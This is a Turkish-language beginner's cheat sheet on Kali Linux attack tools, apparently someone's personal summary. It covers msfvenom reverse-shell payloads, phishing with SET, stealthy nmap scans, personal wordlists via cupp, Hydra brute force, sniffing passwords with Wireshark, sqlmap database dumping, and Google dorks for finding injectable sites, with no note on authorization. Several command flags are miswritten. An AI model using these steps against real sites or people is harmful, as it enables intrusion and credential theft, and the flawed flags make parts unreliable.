Eğer siber güvenlik ile ilgileniyor iseniz giriş seviyesi kendi yaptığım bir özet.
Kali Linux.
Metasploit-Framework ile penetrasyon testi:
Msfconsole >>> metasploit çalıştırır.
Show (payloads-exploits) >>> payload veya exploitleri görüntüler.
Msfvenom -p (payload adı) lhost=(IP adresiniz) lport=(herhangi bir 4 haneli sayı girin) -f (format) > (dosyaadi).(format)
Search (kelime) >>> aramak istediğiniz kelimeyi girin.
Use (exploit-payload adı)>>> exploit veya payloada girer.
Show options >>> ayarları görüntüler.
Run >>> tarama yapar.
Bağlantı kurulduğunda meterpreter konsolu açılır.
Help >>> yapabileceklerinizi buraya bakarak yapabilirsiniz.
Maltego ile sorgu;
Maltego >>> maltegoyu çalıştırır.
Sosyal mühendislik.
Setoolkit >>> sosyal mühendislik kitini çalıştırır.
Phishing vb yapabilirsiniz.
Site zaafiyet taraması:
1-)fierce ile keşif yapma;
Fierce -h >>> yardım almak için kullanılır.
Fierce --domain (sitealanadi) >>> site IP keşfi yapmak için kullanılır.
2-)wapiti ile tarama;
Wapiti -u (sitelinki) >>> XSS veya SQL açığı bulursa bildirecektir.
3-)owaspzap;
Zaproxy >>> ile grafiksel bir arayüz çıkar buradan linki girip tarama yapabilirsiniz.
4-)dirb ile admin panel bulma;
Dirb (sitelinki) >>> admin panel bulmak için kullanılır genelde.
5-)nmap ile site zaafiyet taraması yapma;
İlk önce site IP adresini buluyoruz. Bunun için ipsorgu.com a girip linki yapıştırıyoruz ve IP adresini kopyalıyoruz. Ardından.
Nmap (sitelinki) >>> genel tarama yapar.
Nmap -SS (sitelinki) >>> log kayıtlarına takılmadan tarama yapar.
Nmap -o -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek tarama yapar.
Nmap -o -a -SS (sitelinki) >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak tarama yapar.
Nmap -o -a -SS -il (dosya).txt >>> log kayıtlarına takılmadan, OS sistemini öğrenerek, işletim sistemini öğrenmeye çalışarak, çoklu IP taraması yapar.
6-) whois ile site bilgilerini öğrenme;
Whois (sitealanadı.com) >>> site ile ilgili dökümleri önünüze sunar.
Wordlist oluşturma.
1-)normal wordlist oluşturma;
Crunch (min hane) (Max hane) (wordlistte geçecek karakterler) -o (wordlistadi).txt
Örnek;
Crunch 8 8 1234567890abcdefg -o liste.txt
2-)sözlük (site) wordlisti oluşturma;
Cewl -d (kaç katman tarıyacağını girin) -m (kaç haneli olacağını girin) (site linki) -w (wordlist adı)
Örnek;
Cewl -d 3 -m 8
http://www.alphaonenow.org/info.php?id=131 -w liste.
3-) kişiye yönelik wordlist oluşturma;
İlk önce cupp aracını indiriyoruz.
Apt install cupp.
Ardından.
Cupp -i
Sonra gereken bilgileri veriyoruz ve wordlist hazır.
Bruteforce saldırısı yapma.
1-)Hydra ile SSL destekli sitelere saldırma;
Hydra -h >>> 4 farklı seçenek vardır uygulayabilirsiniz.
(Başka araçlarda var GitHub'ta mevcut)
Ağ izleme.
1-) Wireshark ile ağ izleme;
Wireshark >>> programı açar istediğiniz ağı izleyebilirsiniz eğer HTTP ise follow/TCP stream diyerek kişinin şifrelerini ve adlarını görebilirsiniz(detaylı adli bilişim aracıdır vaktinizi alabilir)
2-)kismet ile ağınızda kim var kim yok kontrol edin;
Kismet -c (ağ geçidinizi yazın örnek: WLAN0, ETH0) >>> bir link verecektir tarayıcınızda açın Linux kullanıcı adınızı şifrenizi girin (root geçerlidir)
3-) ettercap ile ağ izleme:
Ettercap -g >>> ettercapı başlatır.
Site sömürgecilik.
1-)sqlmap ile site sömürgesi;
Sqlmap -u (sitelinki) --dbs >>> sitenin databasesini araştırır.
Sqlmap -u (sitelinki) -d (database adı) --tables
>>> Sitenin tablolarını araştırır.
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) --columns >>> sitenin columnlarını araştırır.
Sqlmap -u (sitelinki) -d (database adı) -t (tablo adı) -c (column adı) --dump >>> size içeriği veya sonucu gösterir.
Bu sadece SQL açıklı sitelerde geçerlidir.
SQL açıklı site nasıl bulunur?
Google'da dork aratarak bulabilirsiniz.
Dorkları kendiniz yapsanız daha etkili sonuç alırsınız.
Hazır dorklar;
İnurl: Staff_id=
İnurl: PHP? _id=
İnurl: None_id=
İnurl: Me_id=
İnurl: Login? _id=
Sitede SQL açığı olduğunu nasıl anlarız?
Site linkinin sonuna (') işaretini koyarız eğer varsa;
Mysql_ ifadesi geçen bir hata alırız.
Bilgisayarınızı bir web sunucusu yapın!
Service Apache2 start-stop-restart >>> Apache2 (web) sunucusunu başlat-durdur-yenidenbaşlat
Bilgisayarınızın IP adresi sunucunuzun adresidir. IP adresinizi tarayıcıya girin ve entera basın. Debian sitesi gelecektir.
/var/www/html >>> buraya HTML dosyanızı atın ve tarayıcıya.
İp adresiniz/(dosyanizin adi).html olarak aratın. Siteniz karşınıza gelecektir.
Örnek;
192.168.0.1/login.html
Kali Linux genel komutlar:
Shutdown -h (şimdi-Now, saat-{örneğin. 21:00})>>>
Bilgisayarı kapatır.
Shutdown -r (şimdi-Now, saat-{örneğin. 20:00})>>> bilgisayarı yeniden başlatır.
Ls >> dizin içeriğini görüntüler.
CD (klasör) >> klasöre girer.
CD. >> klasörden çıkar.
Sudo >>> root değilken root işlem yapmayı sağlar.
Passwd (kullanıcı adı) >>> şifre değiştirir.
Apt-get Update >> Kali Linux paketlerini yükseltir.
Apt-get upgrade >> Kali Linux paketlerini günceller.
Apt install (paketadı) >> paket yükler.
Apt-get install --reinstall (paket adı) >>> paketi baştan kurar.
Chmod +X (dosyaadi) >> dosyaya izin verir.
Chown (kullaniciadi) (dosyaismi) >> sahiplik değiştirir.
Chown -r root (dosyaismi) >> root yetkisi verir.
Cp (dosyaadi) (tasinacak dizin) >> dosya kopyalar.
Mv (dosyaadi) (tasinacak dizin) >> dosya taşır.
ZIP (dosyaadi) >> dosyayı arşivler.
Unzip (dosyaadi) >> dosyayı arşivden çıkarır.
Openvpn (dosyaismi) >>> VPN açar.
Kali Linux IP değiştirme.
İfconfig yazın >>> IP adresiniz hakkında bilgilerinizi görüntüler.
Yeni terminal açıp;
CD /etc/network/ >>> dizinine giriyoruz.
Nano interfaces >>> dosyayı düzenleyeceğiz.
&(En alt satıra inin)&
İface (ağ geçidiniz) inet static.
(Tabbasın)address (istediğiniz IP adresi yazın)
(Tabbasın)netmask (ilk terminalde yazanı yaz)
(Tabbasın)broadcast (ilk terminalde yazanı yaz)
(Tabbasın)gateway (modem arayüz ipnizi yazın)
CTRL+X basın sonra
basın ve enterlayın.
Reboot yazın >>> sistemi yeniden başlatır.
İfup (ağ geçidiniz örnek: WLAN0, ETH0) >>> ağ geçidini etkinleştirir (her açılışta yazmanız gerekir)
Not: ETH0 da çalışacaktır WLAN0'da çalıştıramadım ama deneyin.
Websploit.
Apt install websploit >>> websploit aracını kurar.
Websploit >>> websploit aracını çalıştırır.
Show modules >>> tüm modülleri gösterir.
Use (modül adı) >>> modüle girer.
Options >>> ayarları görüntüler.
Help >>> yardım almak için kullanılır.
Set (ayar) >>> ayarları düzenler.
Execute >>> başlatır.
Termineter kullanımı.
Apt install termineter >>> termineteri yükler.
Termineter >>> termineteri başlatır.
Show modules >>> modülleri görüntüler.
Use (modül) >>> modüle girer.
Show options >>> ayarları görüntüler.
Set (ayar) >>> ayar değiştirir.
Help >>> yardım almak için kullanılır.
Run >>> modülü başlatır.
Lynis ile sistem güvenlik taraması.
Git clone (indirme linki)>>> lynis aracını GitHub deposundan indiriyoruz.
/Lynis audit System >>> tarama başlatır.
Wpscan ile WordPress site taraması;
Wpscan --URL (sitelinki.com)